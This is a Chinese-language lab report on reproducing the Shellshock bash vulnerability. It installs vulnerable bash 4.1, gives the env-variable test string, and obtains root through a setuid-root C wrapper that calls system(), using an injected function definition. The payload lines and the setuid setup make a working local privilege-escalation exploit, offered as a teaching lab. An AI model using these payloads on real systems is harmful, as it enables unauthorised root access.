---
title: Linux 《ShellShock攻击实验》实验报告
categories: Linux
---

![image.png](https://upload-images.jianshu.io/upload_images/15325592-7884d69dd0ac51a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
<!-- more -->

#  介绍

> wiki: Shellshock，又称Bashdoor，是在Unix中广泛使用的Bash shell中的一个安全漏洞，首次于2014年9月24日公开。许多互联网守护进程，如网页服务器，使用bash来处理某些命令，从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。

#  环境搭建

- 下载

```
$ sudo su
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
```

> 使用非 root 用户登录，这里使用 ubuntu 用户，然后切到 root 权限安装4.1版 bash。

- 解压并进入目录

```
$ tar xf bash-4.1.tar.gz && cd bash-4.1
```

- 配置

```
$ ./configure
```

- 构建

```
$ make && make test
```

- 安装

```
$ make install
```

- 删除旧 bash 软连接

```
$ rm /bin/bash
```

- 创建新 bash 软连接

```
$ ln -s /usr/local/bin/bash /bin/bash
```

> 删除原来的 bash 软连接，并创建新的软连接，到目前为止，环境已经搭建完成。

#  测试

- 退出 root 用户

```
$ exit
```

- 检测是否存在 shellshock 漏洞

```
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
```

> 如果输出 vulnerable，说明 bash 有漏洞。

#  shellshock漏洞说明

> 简单了解下 bash 自定义函数，只需要函数名就能够调用该函数。

- bash 自定义函数

```
$ export foo='() { :; }; echo Hello World'
$ bash
$ Hello World
```

- bash 对应的环境变量

```
KEY = foo
VALUE = () { :; }; echo Hello World
```

> bash 读取了环境变量，在定义 foo 之后直接调用了后面的函数。一旦调用 bash，自定义的语句就直接触发。

#  重现shellshock攻击

> 通过攻击 Set-UID 程序来获得 root 权限。

- 创建软连接，让 /bin/sh 指向 /bin/bash

```
$ sudo ln -sf /bin/bash /bin/sh
```

- 创建 /home/ubuntu/shock.c，内容如下

```
# include <unistd.h>
# include <stdlib.h>
# include <stdio.h>
void main()
{
    setuid(geteuid()); // 设置real uid等于effective uid
    system("/bin/ls -l");
}
```

- 切换 root 用户编译 shock.c

```
$ sudo su && gcc -o shock shock.c
```

- 设置编译后的 shock 所有者为 root

```
$ chmod u+s shock
```

#  hack 过程

- 切换 ubuntu 用户

```
$ exit
```

- 执行 shock

```
$ export foo='() { :; }; bash'
$ ./shock
$ root@VM-2-14-ubuntu:/home/ubuntu
```

> 成功拿到 root 用户权限。
